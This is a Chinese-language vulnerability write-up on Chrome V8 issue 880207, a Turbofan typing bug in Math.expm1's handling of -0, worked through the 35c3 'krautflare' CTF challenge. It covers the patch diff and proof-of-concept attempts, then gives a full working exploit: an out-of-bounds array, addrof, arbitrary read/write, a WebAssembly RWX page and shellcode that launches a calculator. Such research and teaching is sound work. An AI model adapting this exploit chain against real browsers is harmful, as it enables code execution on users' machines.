ddme @PortalLab实验室
环境配置
env:PATCH_FLAG: trueCOMMIT: 408d89041e7a21f74b37294ebed59f88d357b9c1DEPOT_UPLOAD: falseSRC_UPLOAD: trueBINARY_UPLOAD: false
编译
cd v8x64.debugninja -C out.gn/x64.debug d8x64.releaseninja -C out.gn/x64.release d8cd ..
漏洞分析
看下diff
diff --git a/src/compiler/operation-typer.cc b/src/compiler/operation-typer.ccindex b88b5c6..85c0998 100644--- a/src/compiler/operation-typer.cc+++ b/src/compiler/operation-typer.ccType OperationTyper::NumberExpm1(Type type) {DCHECK(type.Is(Type::Number()));- return Type::Union(Type::PlainNumber(), Type::NaN(), zone());+ return Type::Number();}Type OperationTyper::NumberFloor(Type type) {
简单看来就是之前返回值的类型判断失误
从这里?
https://docs.google.com/presentation/d/1DJcWByz11jLoQyNhmOvkZSrkgcVhllIlCHmal1tGzaw/edit#slide=id.g52a72d9904_6_6
可以看到
V8 version 7.1.0 (candidate)d8> %DebugPrint(-0)DebugPrint: -00x27e6d5e82641: [Map]- type: HEAP_NUMBER_TYPE- instance size: 16- elements kind: HOLEY_ELEMENTS- unused property fields: 0- enum length: invalid- stable_map- back pointer: 0x27e6d5e825b1 <undefined>- prototype_validity cell: 0- instance descriptors (own) #0: 0x27e6d5e82321 <DescriptorArray[2]>- layout descriptor: (nil)- prototype: 0x27e6d5e822a1 <null>- constructor: 0x27e6d5e822a1 <null>- dependent code: 0x27e6d5e82391 <Other heap object (WEAK_FIXED_ARRAY_TYPE)>- construction counter: 00d8> %DebugPrint(0)DebugPrint: Smi: 0x0 (0)
可以看到-0和0差别还挺大,显示-0的type是HEAP_NUMBER_TYPE。
我们前面看到turbofan对其返回值定义类型里面没有-0这一说,但实际上会返回,测试一下。
function foo(){return Object.is(Math.expm1(-0), -0);}print(foo());%OptimizeFunctionOnNextCall(foo);print(foo());
可以看到优化之后和优化之前结果不同,我猜turbofan直接将其优化为false了
看了一下还真是,我们的目的是要让turbofan以为它是false,实际上它是true,这样的话就能数组越界(true为1,false为0,turbofan认为是0,觉得不会越界,所以会把CheckBound优化掉,这是漏洞的重点,但是运行时实际是1,然后乘法就能获得任意长度越界),这样就要求它在后面的优化阶段不能直接将其优化为false,我们要逃过一些优化阶段。
构造越界poc
首先是Object.is(x, -0)的问题,通常这个运算在turbofan里呈现的是一个SameValue结点 这里?
https://docs.google.com/presentation/d/1DJcWByz11jLoQyNhmOvkZSrkgcVhllIlCHmal1tGzaw/edit#slide=id.g52a72d9904_6_27
但是对于typed optimization会把它用别的直接判断结点替代,就比如我们这里和-0判断是否相等,那就会直接替换为判断是否和-0相等的结点,单这点看不出什么,似乎不影响我们的利用,但是这里优化还没完,在后面,因为判断Math.expm1(x) 的结果不可能是-0,所以这个结点会被进一步直接优化为false(在Load elimination phase),所以我们必须阻止其由SameValue变为ObjectIsMinusZero。
那么我们简单的不让turbofan在优化时能够确保Object.is(x, Math.expm1(y))中的一个参数为-0就行,很简单的一件事,我们可以这么做。
function foo(x){return Object.is(Math.expm1(-0), x);}print(foo(0));%OptimizeFunctionOnNextCall(foo);print(foo(0));print(foo(-0));
因为优化时根据调用产生的vector,没有指定是-0,而且那参数还会变,所以没有去掉SameValue,但这只是一方面,我们需要更详细的。
我们需要在simplified lowering前使其保持SameValue,也就是可以在escape analysis里把确切的值得出,那么我们可以通过。
let o = {mz: -0};Object.is(o.mz, Math.expm1(-0));
这种形式来使得在escape analysis里面出确切值,在simplified lowering中判断其为false,这样才能访问数组时取消check bound。
和slide上写的不太一样,那上面写的是这种程度的变量简化在loadelimiation阶段就能替换上去,等不到escape。
slide就说这种方法在实践中没有达到预期目的… :,我自己试了下也是如此,后面作者写的内容我分辨不出是不是这种思路的延续,当我尝试去写时,提炼出来的无非是,在优化一次后再破坏一次,然后再优化,这似乎就是他说的能避免ChangeFloat64ToTagged从而避免-0被截断为0,并且我也在diff里找到了这份poc。
(function TestOptimizedFastExpm1MinusZero() {function foo() {return Object.is(Math.expm1(-0), -0);}assertTrue(foo());%OptimizeFunctionOnNextCall(foo);assertTrue(foo());})();(function TestOptimizedExpm1MinusZeroSlowPath() {function f(x) {return Object.is(Math.expm1(x), -0);}function g() {return f(-0);}f(0);// Compile function optimistically for numbers (with fast inlined// path for Math.expm1).%OptimizeFunctionOnNextCall(f);// Invalidate the optimistic assumption, deopting and marking non-number// input feedback in the call IC.f("0");// Optimize again, now with non-lowered call to Math.expm1.assertTrue(g());%OptimizeFunctionOnNextCall(g);assertTrue(g());})();
能成功返回false但是看turbolizer也是被turbofan直接优化为false,还是要自己写。
最后心态崩溃,选择35c3 ctf的一道赛题附件来做,题目下载地址?
https://abiondo.me/assets/ctf/35c3/krautflare-33ce1021f2353607a9d4cc0af02b0b28.tar
那道题基本就是还原了这个issue,不同的是,在自己编译的d8上跑poccheck bound怎么都去不掉,而在这一赛题上。
function foo(x) {let o = {mz: -0};let i = Object.is(Math.expm1(x), o.mz);i *= 10;let a = [0.1, 0.2, 0.3, 0.4, 0.5];return a[i];}foo(0);for(let i = 10000;i>0;i--){foo("0");}for(let i=10000;i>0;i--){foo(0);}print(foo(-0));
如果你读出来是undefine,不要灰心,换个越界下标,从合法下标开始一个个增一个个试。
那么我们最终越界poc。
var oob_arr;function foo(x) {let o = {mz: -0};let i = Object.is(Math.expm1(x), o.mz);i *= 14;let a = [0.1, 0.2, 0.3, 0.4, 0.5];let b = [1.1, 1.2, 1.3, 1.4];oob_arr = b;a[i] = -1;}foo(0);for(let i = 10000;i>0;i--){foo("0");}for(let i=10000;i>0;i--){foo(0);}foo(-0);print(oob_arr.length);
如此我们就得到了一个越界数组,我们需要做的是误导turbofan,让其产生错误的判断,从而消去一些检查,因为turbofan认为不会发生的事并不是真的不会发生,他只是基于优化时的feedback的猜测去更改一些生成的IR,另外数组越界要发生在函数内,因为优化的是函数,对应的能优化掉的检查也是函数内的,我们想要返回一个能够越界的数字给外面数组用来越界是不现实的,我们要么在内部完成越界,要么把内部完成越界的数组或者越界后读的值,或者越界后写入函数外数组的length位置。
另外对于越界之后的操作,差别不大,只需好好调试或查找资料,自己可以完成剩余部分的工作,贴上我写的。
exp
function hex(i){return i.toString(16).padStart(16, "0");}const buf = new ArrayBuffer(8);const f64 = new Float64Array(buf);const u32 = new Uint32Array(buf);function f2i(val){f64[0] = val;let tmp = Array.from(u32);return tmp[1] * 0x100000000 + tmp[0];}function i2f(val){let tmp = [];tmp[0] = parseInt(val % 0x100000000);tmp[1] = parseInt((val - tmp[0]) / 0x100000000);u32.set(tmp);return f64[0];}var oob_arr;function foo(x) {let o = {mz: -0};let i = Object.is(Math.expm1(x), o.mz);i *= 14;let a = [0.1, 0.2, 0.3, 0.4, 0.5];let b = [1.1, 1.2, 1.3, 1.4];oob_arr = b;a[i] = -1;}foo(0);for(let i = 10000;i>0;i--){foo("0");}for(let i=10000;i>0;i--){foo(0);}foo(-0);print(oob_arr.length);var obj = {mark:i2f(0x11111111),n:i2f(0x41414141)};var ABuffer = new ArrayBuffer(0x200);var off_buffer = 0;var off_obj = 0;//%DebugPrint(obj);//%DebugPrint(ABuffer);for(var i=0;i<500;i++){let tmp = oob_arr[i];if(f2i(tmp) == 0x11111111){off_obj = i+1;break;}}for(var i=0;i<500;i++){let tmp = oob_arr[i];if(f2i(tmp) == 0x0000000000000200){off_buffer = i+1;break;}}console.log("[+] off_obj @"+off_obj);console.log("[+] off_buffer @"+off_buffer);let dataView = new DataView(ABuffer);function addrof(x){obj.n = x;return f2i(oob_arr[off_obj]);}function arb_read(addr){oob_arr[off_buffer] = i2f(addr);return f2i(dataView.getFloat64(0,true));}function arb_write(addr,payload){oob_arr[off_buffer] = i2f(addr);for(let i=0; i<payload.length; i++) {dataView.setUint8(i, payload[i]);}}let wasmCode = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11]);let wasmModule = new WebAssembly.Module(wasmCode);let wasmInstance = new WebAssembly.Instance(wasmModule);let f = wasmInstance.exports.main;let f_Addr = addrof(f);f_Addr = arb_read(f_Addr-1+8*3);f_Addr = arb_read(f_Addr-1+8*1);f_Addr = arb_read(f_Addr-1+8*2);rwx_addr = arb_read(f_Addr-1+8*0x1d);print("[*] Get RWX address : "+hex(rwx_addr));var shellcode = [0x48,0xb8,0x2f,0x78,0x63,0x61,0x6c,0x63,0x0,0x0,0x50,0x48,0xb8,0x2f,0x75,0x73,0x72,0x2f,0x62,0x69,0x6e,0x50,0x48,0x89,0xe7,0x48,0x31,0xc0,0x50,0x57,0x48,0x89,0xe6,0x48,0x31,0xd2,0x48,0xc7,0xc0,0x3a,0x31,0x00,0x00,0x50,0x48,0xb8,0x44,0x49,0x53,0x50,0x4c,0x41,0x59,0x3d,0x50,0x48,0x89,0xe2,0x48,0x31,0xc0,0x50,0x52,0x48,0x89,0xe2,0x48,0xc7,0xc0,0x3b,0x00,0x00,0x00,0x0f,0x05];arb_write(rwx_addr, shellcode);print("[*] Tigger my shellcode");f();
其实真正核心工作只有构造出越界数组部分,剩下的把自己以前写的exp搬来修改调整就出来了。
参考
https://docs.google.com/presentation/d/1DJcWByz11jLoQyNhmOvkZSrkgcVhllIlCHmal1tGzaw/edit#slide=id.g52a72d9904_6_0
https://abiondo.me/2019/01/02/exploiting-math-expm1-v8/
往期 · 推荐
原文始发于微信公众号(星阑科技):【技术干货】Chrome-V8-Issue-880207
